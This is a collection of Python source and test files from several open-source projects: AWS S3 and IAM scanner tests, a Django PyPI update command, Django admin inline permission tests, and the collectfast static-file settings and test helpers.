with caplog.at_level(logging.WARNING):
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("denied")
assert "AccessDenied" in caplog.text
def get_bucket_versioning(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "access-denied":
raise client_error("GetBucketVersioning", "AccessDenied", "Access Denied")
versioning_mapping: Dict[str, Any] = {
"versioning-enabled": responses.GET_BUCKET_VERSIONING_ENABLED,
"versioning-suspended": responses.GET_BUCKET_VERSIONING_SUSPENDED,
"versioning-unset": responses.GET_BUCKET_VERSIONING_UNSET,
}
return versioning_mapping[buck]
def s3_client_versioning() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_versioning=Mock(side_effect=get_bucket_versioning)))
def test_get_bucket_versioning_enabled() -> None:
versioning = bucket_versioning(enabled=True)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-enabled")
def test_get_bucket_versioning_suspended() -> None:
versioning = bucket_versioning(enabled=False)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-suspended")
def test_get_bucket_versioning_unset() -> None:
versioning = bucket_versioning(enabled=False)
assert versioning == s3_client_versioning().get_bucket_versioning("versioning-unset")
def test_get_bucket_versioning_failure(caplog: Any) -> None:
versioning = bucket_versioning(enabled=False)
with caplog.at_level(logging.WARNING):
assert versioning == s3_client_versioning().get_bucket_versioning("access-denied")
assert "AccessDenied" in caplog.text
def put_object(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
key = str(kwargs["Key"])
body = str(kwargs["Body"])
return (
responses.PUT_OBJECT
if buck == "buck" and key == "obj" and body == "bla"
else _raise(client_error("PutObject", "AccessDenied", "Access Denied"))
)
def s3_client_put_object() -> AwsS3Client:
return AwsS3Client(Mock(put_object=Mock(side_effect=put_object)))
def test_put_object_success() -> None:
assert "some id" == s3_client_put_object().put_object(bucket="buck", object_name="obj", object_content="bla")
def test_put_object_failure(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
s3_client_put_object().put_object(bucket="denied", object_name="obj", object_content="bla")
assert "AccessDenied" in caplog.text
def test_get_bucket_policy() -> None:
expected_policy = {"Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:getObject", "Resource": "*"}]}
s3_client = AwsS3Client(
Mock(
get_bucket_policy=Mock(
side_effect=lambda **kwargs: responses.GET_BUCKET_POLICY if kwargs["Bucket"] == "some-bucket" else None
)
)
)
actual_policy = s3_client.get_bucket_policy("some-bucket")
assert actual_policy == expected_policy
def test_get_bucket_policy_bucket_does_not_exist(caplog: Any) -> None:
s3_client = AwsS3Client(
Mock(get_bucket_policy=Mock(side_effect=client_error("GetBucketPolicy", "NoSuchBucket", "no")))
)
with caplog.at_level(logging.WARNING):
assert s3_client.get_bucket_policy("boom") is None
assert "NoSuchBucket" in caplog.text
assert "boom" in caplog.text
```
#### File: tests/data/test_aws_iam_types.py
```python
from pytest import raises
from src.data.aws_scanner_exceptions import UnsupportedPolicyDocumentElement
from tests.test_types_generator import policy
def test_policy_doc_equals() -> None:
single_statement = {
"Statement": {"Effect": "Allow", "Action": ["a:2", "a:1", "b:2", "b:3", "b:1"], "Resource": ["1", "2"]}
}
multi_statements = {
"Statement": [
{"Effect": "Allow", "Action": ["b:1", "b:2", "a:2"], "Resource": "1"},
{"Effect": "Allow", "Action": ["b:1", "b:2"], "Resource": "2"},
{"Effect": "Allow", "Action": "a:2", "Resource": "2"},
{"Effect": "Allow", "Action": ["a:1", "b:3"], "Resource": ["2", "1"]},
],
}
assert policy(document=single_statement).doc_equals(multi_statements)
def test_policy_doc_equals_with_condition() -> None:
single_statement = {
"Statement": {"Effect": "Deny", "Action": "e:7", "Resource": ["abc", "def"], "Condition": {"a": {"b": "c"}}},
}
multi_statements = {
"Statement": [
{"Effect": "Deny", "Action": "e:7", "Resource": "def", "Condition": {"a": {"b": "c"}}},
{"Effect": "Deny", "Action": "e:7", "Resource": "abc", "Condition": {"a": {"b": "c"}}},
],
}
assert policy(document=single_statement).doc_equals(multi_statements)
def test_policy_doc_not_equals_when_effect_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Deny", "Action": "a:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_action_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "b:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_resource_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "2"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_not_equals_when_condition_mismatch() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Condition": {"banana": 9}}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1"}}
assert not policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_equals_ignores_sid() -> None:
doc_a = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Sid": "blue"}}
doc_b = {"Statement": {"Effect": "Allow", "Action": "a:1", "Resource": "1", "Sid": "gray"}}
assert policy(document=doc_a).doc_equals(doc_b)
def test_policy_doc_equals_not_action_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "NotAction": "a:1", "Resource": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotAction"):
policy().doc_equals(doc)
def test_policy_doc_equals_not_resource_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "NotResource": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotResource"):
policy().doc_equals(doc)
def test_policy_doc_equals_principal_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "Principal": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="Principal"):
policy().doc_equals(doc)
def test_policy_doc_equals_not_principal_unsupported() -> None:
doc = {"Statement": {"Effect": "Allow", "Action": "a:1", "NotPrincipal": "1"}}
with raises(UnsupportedPolicyDocumentElement, match="NotPrincipal"):
policy().doc_equals(doc)
```
#### File: tests/tasks/test_aws_athena_task.py
```python
from unittest import TestCase
from unittest.mock import Mock
from tests.test_types_generator import athena_task
class TestAwsAthenaTask(TestCase):
def test_run_task(self) -> None:
with self.assertRaises(NotImplementedError):
athena_task()._run_task(Mock())
```
#### File: tests/tasks/test_aws_audit_iam_task.py
```python
import dataclasses
import datetime
from unittest.mock import Mock, call
from tests.test_types_generator import account
from src.tasks.aws_audit_iam_task import AwsAuditIamTask
from src.data.aws_iam_types import AccessKey, User
def test_run_task() -> None:
user1 = User(user_name="user1")
user2 = User(user_name="user2")
users = [user1, user2]
user1_key1 = AccessKey(id="keyid1", user_name=user1.user_name, created=datetime.datetime(2021, 11, 1, 17, 10, 0))
user2_key1 = AccessKey(id="u2key1", user_name=user2.user_name, created=datetime.datetime(2020, 10, 15, 1, 23, 27))
user2_key2 = AccessKey(id="u2key2", user_name=user2.user_name, created=datetime.datetime(2021, 4, 29, 9, 55, 43))
last_used = [datetime.datetime(2021, 11, 2, 8, 45, 12), None, datetime.datetime(2021, 5, 5, 14, 34, 23)]
iam_client = Mock(
list_users=Mock(return_value=users),
list_access_keys=Mock(side_effect=[[user1_key1], [user2_key1, user2_key2]]),
get_access_key_last_used=Mock(side_effect=last_used),
)
expected_report = {
"iam_access_keys": [
dataclasses.replace(user1_key1, last_used=last_used[0]),
dataclasses.replace(user2_key1),
dataclasses.replace(user2_key2, last_used=last_used[2]),
]
}
assert expected_report == AwsAuditIamTask(account())._run_task(iam_client)
assert iam_client.list_access_keys.call_args_list == [call(user1), call(user2)]
assert iam_client.get_access_key_last_used.call_args_list == [call(user1_key1), call(user2_key1), call(user2_key2)]
```
#### File: platsec-aws-scanner/tests/test_json_serializer.py
```python
import datetime
from unittest import TestCase
from dataclasses import dataclass
from typing import Callable, Optional
from src.json_serializer import to_json
class TestJsonSerializer(TestCase):
def test_serialize_exclude_callable_and_none_properties(self) -> None:
self.assertEqual('{"greetings": "Bonjour!"}', to_json(TestJsonSerializer.TestObject()))
@dataclass
class TestObject:
_secret: str = "I'm private, don't serialise me"
greetings: str = "Bonjour!"
empty: Optional[str] = None
func: Callable[[], str] = lambda: "hello"
def test_serialize_datetime(self) -> None:
self.assertEqual(
'{"name": "Andy", "born": "2021-11-01T15:30:10"}', to_json(TestJsonSerializer.TestDatetimeObject())
)
@dataclass
class TestDatetimeObject:
name: str = "Andy"
born: datetime.datetime = datetime.datetime(2021, 11, 1, 15, 30, 10)
```
|
{
"source": "jezdez-archive/djangoapps",
"score": 2
}
|
#### File: management/commands/updateapps.py
```python
import xmlrpclib
from django.conf import settings
from django.core.management.base import NoArgsCommand
PYPI_URL = "http://cheeseshop.python.org/pypi"
PYPI_KEYWORD = "django"
PYPI_METADATA = (
"name",
"description",
"long_description",
"homepage",
"license",
)
from djangoapps.models import DjangoApp
class Command(NoArgsCommand):
help = 'Used to update the feeds of the aggregator app.'
def handle_noargs(self, **options):
"""
queries PyPI for package with the default keyword and updates the app
database accordingly
"""
specs = {'keywords': PYPI_KEYWORD}
pypi = xmlrpclib.Server(PYPI_URL)
query = pypi.search(specs)
results = sorted(query, key=lambda s: s['name'].lower())
for package in results:
name = package['name']
version = pypi.package_releases(name)[-1]
# Load release information
try:
info = pypi.release_data(name, version)
except IndexError:
print "Skipping %r: no versions" % name
continue
print "Updating: %r (%s)" % (name, version)
# Load app or create if not existing
# try:
# app = DjangoApp.objects.get(name=name)
# except DjangoApp.DoesNotExist:
# app = DjangoApp(name=name)
# print "Created app %r" % name
print info.keys()
# TODO
# Fill app with data from PyPI
# the model fields should have the same variable name
for data in PYPI_METADATA:
value = info.get(data, '')
if value is None or value.strip().lower() == "unknown":
value = ""
#setattr(app, data, value.strip())
#app.save()
```
|
{
"source": "jezdez-archive/django-mobileadmin",
"score": 2
}
|
#### File: django-mobileadmin/mobileadmin/__init__.py
```python
from django.contrib.admin import site as main_site
from django.core.exceptions import ImproperlyConfigured
from mobileadmin import decorators, views
from mobileadmin.conf import settings
### From http://www2.lib.uchicago.edu/keith/courses/python/class/5/#attrref
def classlookup(C, name):
if C.__dict__.has_key(name):
return (1, C.__dict__[name])
else:
for b in C.__bases__:
success, value = classlookup(b, name)
if success:
return (1, value)
else:
pass
else:
return (0, None)
def autoregister():
"""
Auto-register all ModelAdmin instances of the default AdminSite with the
mobileadmin app and set the templates accordingly.
"""
from django.contrib.auth.admin import UserAdmin
from mobileadmin.sites import site
for model, modeladmin in main_site._registry.iteritems():
admin_class = modeladmin.__class__
for name in settings.TEMPLATE_MAPPING:
(found, value) = classlookup(admin_class, name)
if found:
setattr(admin_class, name, decorators.mobile_templates(value))
if admin_class == UserAdmin:
setattr(admin_class, 'add_view', views.auth_add_view)
site.register(model, admin_class)
def autodiscover():
raise ImproperlyConfigured("Please use the autodiscover function of "
"Django's default admin app and then "
"call 'mobileadmin.autoregister' to use "
"mobileadmin.")
```
|
{
"source": "jezdez-archive/django-old",
"score": 2
}
|
#### File: modeltests/force_insert_update/tests.py
```python
from __future__ import absolute_import
from django.db import transaction, IntegrityError, DatabaseError
from django.test import TestCase
from .models import Counter, WithCustomPK
class ForceTests(TestCase):
def test_force_update(self):
c = Counter.objects.create(name="one", value=1)
# The normal case
c.value = 2
c.save()
# Same thing, via an update
c.value = 3
c.save(force_update=True)
# Won't work because force_update and force_insert are mutually
# exclusive
c.value = 4
self.assertRaises(ValueError, c.save, force_insert=True, force_update=True)
# Try to update something that doesn't have a primary key in the first
# place.
c1 = Counter(name="two", value=2)
self.assertRaises(ValueError, c1.save, force_update=True)
c1.save(force_insert=True)
# Won't work because we can't insert a pk of the same value.
sid = transaction.savepoint()
c.value = 5
self.assertRaises(IntegrityError, c.save, force_insert=True)
transaction.savepoint_rollback(sid)
# Trying to update should still fail, even with manual primary keys, if
# the data isn't in the database already.
obj = WithCustomPK(name=1, value=1)
self.assertRaises(DatabaseError, obj.save, force_update=True)
```
#### File: regressiontests/admin_inlines/tests.py
```python
from __future__ import absolute_import
from django.contrib.admin.helpers import InlineAdminForm
from django.contrib.auth.models import User, Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
# local test models
from .admin import InnerInline
from .models import (Holder, Inner, Holder2, Inner2, Holder3, Inner3, Person,
OutfitItem, Fashionista, Teacher, Parent, Child, Author, Book)
class TestInline(TestCase):
urls = "regressiontests.admin_inlines.urls"
fixtures = ['admin-views-users.xml']
def setUp(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
self.change_url = '/admin/admin_inlines/holder/%i/' % holder.id
result = self.client.login(username='super', password='<PASSWORD>')
self.assertEqual(result, True)
def tearDown(self):
self.client.logout()
def test_can_delete(self):
"""
can_delete should be passed to inlineformset factory.
"""
response = self.client.get(self.change_url)
inner_formset = response.context[-1]['inline_admin_formsets'][0].formset
expected = InnerInline.can_delete
actual = inner_formset.can_delete
self.assertEqual(expected, actual, 'can_delete must be equal')
def test_readonly_stacked_inline_label(self):
"""Bug #13174."""
holder = Holder.objects.create(dummy=42)
inner = Inner.objects.create(holder=holder, dummy=42, readonly='')
response = self.client.get('/admin/admin_inlines/holder/%i/'
% holder.id)
self.assertContains(response, '<label>Inner readonly label:</label>')
def test_many_to_many_inlines(self):
"Autogenerated many-to-many inlines are displayed correctly (#13407)"
response = self.client.get('/admin/admin_inlines/author/add/')
# The heading for the m2m inline block uses the right text
self.assertContains(response, '<h2>Author-book relationships</h2>')
# The "add another" label is correct
self.assertContains(response, 'Add another Author-Book Relationship')
# The '+' is dropped from the autogenerated form prefix (Author_books+)
self.assertContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_primary(self):
person = Person.objects.create(firstname='Imelda')
item = OutfitItem.objects.create(name='Shoes')
# Imelda likes shoes, but can't cary her own bags.
data = {
'shoppingweakness_set-TOTAL_FORMS': 1,
'shoppingweakness_set-INITIAL_FORMS': 0,
'shoppingweakness_set-MAX_NUM_FORMS': 0,
'_save': u'Save',
'person': person.id,
'max_weight': 0,
'shoppingweakness_set-0-item': item.id,
}
response = self.client.post('/admin/admin_inlines/fashionista/add/', data)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(Fashionista.objects.filter(person__firstname='Imelda')), 1)
def test_tabular_non_field_errors(self):
"""
Ensure that non_field_errors are displayed correctly, including the
right value for colspan. Refs #13510.
"""
data = {
'title_set-TOTAL_FORMS': 1,
'title_set-INITIAL_FORMS': 0,
'title_set-MAX_NUM_FORMS': 0,
'_save': u'Save',
'title_set-0-title1': 'a title',
'title_set-0-title2': 'a different title',
}
response = self.client.post('/admin/admin_inlines/titlecollection/add/', data)
# Here colspan is "4": two fields (title1 and title2), one hidden field and the delete checkbock.
self.assertContains(response, '<tr><td colspan="4"><ul class="errorlist"><li>The two titles must be the same</li></ul></td></tr>')
def test_no_parent_callable_lookup(self):
"""Admin inline `readonly_field` shouldn't invoke parent ModelAdmin callable"""
# Identically named callable isn't present in the parent ModelAdmin,
# rendering of the add view shouldn't explode
response = self.client.get('/admin/admin_inlines/novel/add/')
self.assertEqual(response.status_code, 200)
# View should have the child inlines section
self.assertContains(response, '<div class="inline-group" id="chapter_set-group">')
def test_callable_lookup(self):
"""Admin inline should invoke local callable when its name is listed in readonly_fields"""
response = self.client.get('/admin/admin_inlines/poll/add/')
self.assertEqual(response.status_code, 200)
# Add parent object view should have the child inlines section
self.assertContains(response, '<div class="inline-group" id="question_set-group">')
# The right callabe should be used for the inline readonly_fields
# column cells
self.assertContains(response, '<p>Callable in QuestionInline</p>')
def test_help_text(self):
"""
Ensure that the inlines' model field help texts are displayed when
using both the stacked and tabular layouts.
Ref #8190.
"""
response = self.client.get('/admin/admin_inlines/holder4/add/')
self.assertContains(response, '<p class="help">Awesome stacked help text is awesome.</p>', 4)
self.assertContains(response, '<img src="/static/admin/img/icon-unknown.gif" class="help help-tooltip" width="10" height="10" alt="(Awesome tabular help text is awesome.)" title="Awesome tabular help text is awesome." />', 1)
def test_non_related_name_inline(self):
"""
Ensure that multiple inlines with related_name='+' have correct form
prefixes. Bug #16838.
"""
response = self.client.get('/admin/admin_inlines/capofamiglia/add/')
self.assertContains(response,
'<input type="hidden" name="-1-0-id" id="id_-1-0-id" />')
self.assertContains(response,
'<input type="hidden" name="-1-0-capo_famiglia" '
'id="id_-1-0-capo_famiglia" />')
self.assertContains(response,
'<input id="id_-1-0-name" type="text" class="vTextField" '
'name="-1-0-name" maxlength="100" />')
self.assertContains(response,
'<input type="hidden" name="-2-0-id" id="id_-2-0-id" />')
self.assertContains(response,
'<input type="hidden" name="-2-0-capo_famiglia" '
'id="id_-2-0-capo_famiglia" />')
self.assertContains(response,
'<input id="id_-2-0-name" type="text" class="vTextField" '
'name="-2-0-name" maxlength="100" />')
class TestInlineMedia(TestCase):
urls = "regressiontests.admin_inlines.urls"
fixtures = ['admin-views-users.xml']
def setUp(self):
result = self.client.login(username='super', password='<PASSWORD>')
self.assertEqual(result, True)
def tearDown(self):
self.client.logout()
def test_inline_media_only_base(self):
holder = Holder(dummy=13)
holder.save()
Inner(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
def test_inline_media_only_inline(self):
holder = Holder3(dummy=13)
holder.save()
Inner3(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder3/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_inline_scripts.js')
def test_all_inline_media(self):
holder = Holder2(dummy=13)
holder.save()
Inner2(dummy=42, holder=holder).save()
change_url = '/admin/admin_inlines/holder2/%i/' % holder.id
response = self.client.get(change_url)
self.assertContains(response, 'my_awesome_admin_scripts.js')
self.assertContains(response, 'my_awesome_inline_scripts.js')
class TestInlineAdminForm(TestCase):
urls = "regressiontests.admin_inlines.urls"
def test_immutable_content_type(self):
"""Regression for #9362
The problem depends only on InlineAdminForm and its "original"
argument, so we can safely set the other arguments to None/{}. We just
need to check that the content_type argument of Child isn't altered by
the internals of the inline form."""
sally = Teacher.objects.create(name='Sally')
john = Parent.objects.create(name='John')
joe = Child.objects.create(name='Joe', teacher=sally, parent=john)
iaf = InlineAdminForm(None, None, {}, {}, joe)
parent_ct = ContentType.objects.get_for_model(Parent)
self.assertEqual(iaf.original.content_type, parent_ct)
class TestInlinePermissions(TestCase):
"""
Make sure the admin respects permissions for objects that are edited
inline. Refs #8060.
"""
urls = "regressiontests.admin_inlines.urls"
def setUp(self):
self.user = User(username='admin')
self.user.is_staff = True
self.user.is_active = True
self.user.set_password('<PASSWORD>')
self.user.save()
self.author_ct = ContentType.objects.get_for_model(Author)
self.holder_ct = ContentType.objects.get_for_model(Holder2)
self.book_ct = ContentType.objects.get_for_model(Book)
self.inner_ct = ContentType.objects.get_for_model(Inner2)
# User always has permissions to add and change Authors, and Holders,
# the main (parent) models of the inlines. Permissions on the inlines
# vary per test.
permission = Permission.objects.get(codename='add_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_author', content_type=self.author_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='add_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_holder2', content_type=self.holder_ct)
self.user.user_permissions.add(permission)
author = Author.objects.create(pk=1, name=u'The Author')
book = author.books.create(name=u'The inline Book')
self.author_change_url = '/admin/admin_inlines/author/%i/' % author.id
# Get the ID of the automatically created intermediate model for thw Author-Book m2m
author_book_auto_m2m_intermediate = Author.books.through.objects.get(author=author, book=book)
self.author_book_auto_m2m_intermediate_id = author_book_auto_m2m_intermediate.pk
holder = Holder2.objects.create(dummy=13)
inner2 = Inner2.objects.create(dummy=42, holder=holder)
self.holder_change_url = '/admin/admin_inlines/holder2/%i/' % holder.id
self.inner2_id = inner2.id
self.assertEqual(
self.client.login(username='admin', password='<PASSWORD>'),
True)
def tearDown(self):
self.client.logout()
def test_inline_add_m2m_noperm(self):
response = self.client.get('/admin/admin_inlines/author/add/')
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_noperm(self):
response = self.client.get('/admin/admin_inlines/holder2/add/')
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_change_m2m_noperm(self):
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_change_fk_noperm(self):
response = self.client.get(self.holder_change_url)
# No permissions on Inner2s, so no inline
self.assertNotContains(response, '<h2>Inner2s</h2>')
self.assertNotContains(response, 'Add another Inner2')
self.assertNotContains(response, 'id="id_inner2_set-TOTAL_FORMS"')
def test_inline_add_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get('/admin/admin_inlines/author/add/')
# No change permission on Books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
def test_inline_add_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get('/admin/admin_inlines/holder2/add/')
# Add permission on inner2s, so we get the inline
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
self.assertContains(response, 'value="3" id="id_inner2_set-TOTAL_FORMS"')
def test_inline_change_m2m_add_perm(self):
permission = Permission.objects.get(codename='add_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# No change permission on books, so no inline
self.assertNotContains(response, '<h2>Author-book relationships</h2>')
self.assertNotContains(response, 'Add another Author-Book Relationship')
self.assertNotContains(response, 'id="id_Author_books-TOTAL_FORMS"')
self.assertNotContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_m2m_change_perm(self):
permission = Permission.objects.get(codename='change_book', content_type=self.book_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.author_change_url)
# We have change perm on books, so we can add/change/delete inlines
self.assertContains(response, '<h2>Author-book relationships</h2>')
self.assertContains(response, 'Add another Author-Book Relationship')
self.assertContains(response, 'value="4" id="id_Author_books-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="Author_books-0-id" value="%i"' % self.author_book_auto_m2m_intermediate_id)
self.assertContains(response, 'id="id_Author_books-0-DELETE"')
def test_inline_change_fk_add_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add permission on inner2s, so we can add but not modify existing
self.assertContains(response, '<h2>Inner2s</h2>')
self.assertContains(response, 'Add another Inner2')
# 3 extra forms only, not the existing instance form
self.assertContains(response, 'value="3" id="id_inner2_set-TOTAL_FORMS"')
self.assertNotContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
def test_inline_change_fk_change_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change permission on inner2s, so we can change existing but not add new
self.assertContains(response, '<h2>Inner2s</h2>')
# Just the one form for existing instances
self.assertContains(response, 'value="1" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
# max-num 0 means we can't add new ones
self.assertContains(response, 'value="0" id="id_inner2_set-MAX_NUM_FORMS"')
def test_inline_change_fk_add_change_perm(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Add/change perm, so we can add new and change existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance and three extra for new
self.assertContains(response, 'value="4" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
def test_inline_change_fk_change_del_perm(self):
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# Change/delete perm on inner2s, so we can change/delete existing
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, no new
self.assertContains(response, 'value="1" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
def test_inline_change_fk_all_perms(self):
permission = Permission.objects.get(codename='add_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='change_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
permission = Permission.objects.get(codename='delete_inner2', content_type=self.inner_ct)
self.user.user_permissions.add(permission)
response = self.client.get(self.holder_change_url)
# All perms on inner2s, so we can add/change/delete
self.assertContains(response, '<h2>Inner2s</h2>')
# One form for existing instance only, three for new
self.assertContains(response, 'value="4" id="id_inner2_set-TOTAL_FORMS"')
self.assertContains(response, '<input type="hidden" name="inner2_set-0-id" value="%i"' % self.inner2_id)
self.assertContains(response, 'id="id_inner2_set-0-DELETE"')
```
|
{
"source": "jezdez/collectfast",
"score": 2
}
|
#### File: collectfast/collectfast/settings.py
```python
from typing import Container
from typing import Type
from typing import TypeVar
from django.conf import settings
from typing_extensions import Final
T = TypeVar("T")
def _get_setting(type_: Type[T], key: str, default: T) -> T:
value = getattr(settings, key, default)
if not isinstance(value, type_):
raise ValueError(
f"The {key!r} setting must be of type {type_!r}, found {type(value)}"
)
return value
debug: Final = _get_setting(
bool, "COLLECTFAST_DEBUG", _get_setting(bool, "DEBUG", False)
)
cache_key_prefix: Final = _get_setting(
str, "COLLECTFAST_CACHE_KEY_PREFIX", "collectfast06_asset_"
)
cache: Final = _get_setting(str, "COLLECTFAST_CACHE", "default")
threads: Final = _get_setting(int, "COLLECTFAST_THREADS", 0)
enabled: Final = _get_setting(bool, "COLLECTFAST_ENABLED", True)
aws_is_gzipped: Final = _get_setting(bool, "AWS_IS_GZIPPED", False)
gzip_content_types: Final[Container] = _get_setting(
tuple,
"GZIP_CONTENT_TYPES",
(
"text/css",
"text/javascript",
"application/javascript",
"application/x-javascript",
"image/svg+xml",
),
)
```
#### File: tests/command/test_post_process.py
```python
from unittest import mock
from django.contrib.staticfiles.storage import StaticFilesStorage
from django.test import override_settings as override_django_settings
from collectfast.management.commands.collectstatic import Command
from collectfast.tests.utils import clean_static_dir
from collectfast.tests.utils import create_static_file
from collectfast.tests.utils import override_setting
class MockPostProcessing(StaticFilesStorage):
def __init__(self):
super().__init__()
self.post_process = mock.MagicMock()
@override_setting("threads", 2)
@override_django_settings(
STATICFILES_STORAGE="collectfast.tests.command.test_post_process.MockPostProcessing"
)
def test_calls_post_process_with_collected_files() -> None:
clean_static_dir()
path = create_static_file()
cmd = Command()
cmd.run_from_argv(["manage.py", "collectstatic", "--noinput"])
cmd.storage.post_process.assert_called_once_with(
{path.name: (mock.ANY, path.name)}, dry_run=False
)
```
#### File: collectfast/tests/utils.py
```python
import functools
import os
import pathlib
import random
import unittest
import uuid
from typing import Any
from typing import Callable
from typing import Type
from typing import TypeVar
from typing import cast
import pytest
from django.conf import settings as django_settings
from django.utils.module_loading import import_string
from typing_extensions import Final
from collectfast import settings
live_test = pytest.mark.skipif(
os.environ.get("SKIP_LIVE_TESTS") == "true", reason="not running live tests"
)
static_dir: Final = pathlib.Path(django_settings.STATICFILES_DIRS[0])
F = TypeVar("F", bound=Callable[..., Any])
def make_test(func: F) -> Type[unittest.TestCase]:
"""
Creates a class that inherits from `unittest.TestCase` with the decorated
function as a method. Create tests like this:
>>> fn = lambda x: 1337
>>> @make_test
... def test_fn(case):
... case.assertEqual(fn(), 1337)
"""
case = type(func.__name__, (unittest.TestCase,), {func.__name__: func})
case.__module__ = func.__module__
return case
def test_many(**mutations: Callable[[F], F]) -> Callable[[F], Type[unittest.TestCase]]:
def test(func: F) -> Type[unittest.TestCase]:
"""
Creates a class that inherits from `unittest.TestCase` with the decorated
function as a method. Create tests like this:
>>> fn = lambda x: 1337
>>> @make_test
... def test_fn(case):
... case.assertEqual(fn(), 1337)
"""
case_dict = {
"test_%s" % mutation_name: mutation(func)
for mutation_name, mutation in mutations.items()
}
case = type(func.__name__, (unittest.TestCase,), case_dict)
case.__module__ = func.__module__
return case
return test
def create_static_file() -> pathlib.Path:
"""Write random characters to a file in the static directory."""
path = static_dir / f"{uuid.uuid4().hex}.txt"
path.write_text("".join(chr(random.randint(0, 64)) for _ in range(500)))
return path
def clean_static_dir() -> None:
for filename in os.listdir(static_dir.as_posix()):
file = static_dir / filename
if file.is_file():
file.unlink()
